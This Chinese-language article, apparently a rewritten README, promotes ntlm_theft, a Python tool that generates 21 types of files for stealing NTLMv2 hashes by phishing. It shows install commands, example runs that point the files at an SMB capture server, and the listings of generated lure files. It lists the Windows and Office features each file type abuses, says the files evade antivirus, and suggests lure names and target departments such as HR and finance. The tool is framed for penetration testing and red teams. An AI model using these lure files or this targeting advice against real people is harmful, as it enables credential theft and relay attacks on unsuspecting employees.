ntlm_theft完全指南:21种NTLMv2哈希窃取文件生成工具深度解析
项目地址: https://gitcode.com/gh_mirrors/nt/ntlm_theft ntlm_theft是一款开源Python3工具,能够生成21种不同类型的哈希窃取文档。这些文件可用于钓鱼攻击,无论目标是允许SMB流量在其网络外部传输,还是你已在内部网络中。与基于宏的文档或漏洞利用文档相比,这些文件类型的优势在于全部使用“预期功能”构建,2020年6月时未被Windows Defender Antivirus标记,且21种攻击中有17种在完全打补丁的Windows 10主机上有效。
🚀 为什么选择ntlm_theft?
ntlm_theft主要面向渗透测试人员和红队成员,用于对目标公司员工执行内部钓鱼,或大规模测试防病毒软件和电子邮件网关。如果边界防火墙允许出站SMB访问,也可用于外部钓鱼。在渗透测试中,它能轻松查看可用的文件类型,无需像红队参与那样花费时间配置特定攻击,可根据不同部门发送不同类型文件,如向HR部门发送.rtf或.docx文件,向财务部门发送.xlsx电子表格文档。
核心优势
- 多类型支持:支持21种不同文件类型生成,满足多样化攻击场景需求。
- 低检测率:基于“预期功能”构建,不易被防病毒软件识别。
- 高成功率:在完全打补丁的Windows 10主机上,17种攻击有效。
ntlm_theft运行演示
📋 快速入门
环境准备
ntlm_theft需要Python3和xlsxwriter,安装命令如下:
pip3 install xlsxwriter
必要参数
启动工具需提供4个参数:输入格式、输入文件或文件夹以及基本运行模式:
-g, --generate:选择生成所有文件或特定文件类型-s, --server:SMB哈希捕获服务器的IP地址(Responder、impacket ntlmrelayx、Metasploit auxiliary/server/capture/smb等)-f, --filename:不带扩展名的基本文件名,稍后可重命名(例如:test、Board-Meeting2020、Bonus_Payment_Q4)
示例运行
生成所有文件的示例:
# python3 ntlm_theft.py -g all -s 127.0.0.1 -f test
Created: test/test.scf (BROWSE)
Created: test/test-(url).url (BROWSE)
Created: test/test-(icon).url (BROWSE)
Created: test/test.rtf (OPEN)
Created: test/test-(stylesheet).xml (OPEN)
Created: test/test-(fulldocx).xml (OPEN)
Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: test/test-(includepicture).docx (OPEN)
Created: test/test-(remotetemplate).docx (OPEN)
Created: test/test-(frameset).docx (OPEN)
Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: test/test.asx (OPEN)
Created: test/test.jnlp (OPEN)
Created: test/test.application (DOWNLOAD AND OPEN)
Created: test/test.pdf (OPEN AND ALLOW)
Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
Generation Complete.
ntlm_theft示例运行结果
生成仅现代文件的示例:
# python3 ntlm_theft.py -g modern -s 127.0.0.1 -f meeting
Skipping SCF as it does not work on modern Windows
Created: meeting/meeting-(url).url (BROWSE TO FOLDER)
Created: meeting/meeting-(icon).url (BROWSE TO FOLDER)
Created: meeting/meeting.rtf (OPEN)
Created: meeting/meeting-(stylesheet).xml (OPEN)
Created: meeting/meeting-(fulldocx).xml (OPEN)
Created: meeting/meeting.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: meeting/meeting-(includepicture).docx (OPEN)
Created: meeting/meeting-(remotetemplate).docx (OPEN)
Created: meeting/meeting-(frameset).docx (OPEN)
Created: meeting/meeting-(externalcell).xlsx (OPEN)
Created: meeting/meeting.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: meeting/meeting.asx (OPEN)
Created: meeting/meeting.jnlp (OPEN)
Created: meeting/meeting.application (DOWNLOAD AND OPEN)
Created: meeting/meeting.pdf (OPEN AND ALLOW)
Skipping zoom as it does not work on the latest versions
Skipping Autorun.inf as it does not work on modern Windows
Skipping desktop.ini as it does not work on modern Windows
Generation Complete.
生成仅xlsx文件的示例:
# python3 ntlm_theft.py -g xlsx -s 192.168.1.103 -f Bonus_Payment_Q4
Created: Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx (OPEN)
Generation Complete.
📁 支持的攻击类型
浏览包含文件的文件夹
.url– 通过URL字段.url– 通过ICONFILE字段.lnk- 通过icon_location字段.scf– 通过ICONFILE字段(在最新Windows上不起作用)autorun.inf通过OPEN字段(在最新Windows上不起作用)desktop.ini- 通过IconResource字段(在最新Windows上不起作用)
打开文档
.xml– 通过Microsoft Word外部样式表.xml– 通过Microsoft Word includepicture字段.htm– 通过Chrome、IE和Edge的img src(仅在本地打开时,非托管).docx– 通过Microsoft Word includepicture字段.docx– 通过Microsoft Word外部模板.docx– 通过Microsoft Word frameset webSettings.xlsx- 通过Microsoft Excel外部单元格.wax- 通过Windows Media Player播放列表(更好,主要打开方式).asx– 通过Windows Media Player播放列表(更好,主要打开方式).m3u– 通过Windows Media Player播放列表(较差,Win10首先在Groovy中打开).jnlp– 通过Java外部jar.application– 通过任何浏览器(必须通过浏览器下载,否则无法运行)
打开文档并接受弹出窗口
.pdf– 通过Adobe Acrobat Reader
在聊天程序中点击链接
.txt– 格式化为可粘贴到Zoom聊天的链接
🔧 工具获取与安装
要获取ntlm_theft工具,可通过以下命令克隆仓库:
git clone https://gitcode.com/gh_mirrors/nt/ntlm_theft
克隆完成后,进入项目目录,按照上述环境准备步骤安装所需依赖即可开始使用。
📜 许可证
ntlm_theft遵循GNU General Public License v3.0许可,详细信息可查看项目中的LICENSE文件。
🙏 致谢
感谢以下项目和个人对ntlm_theft的贡献:
创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
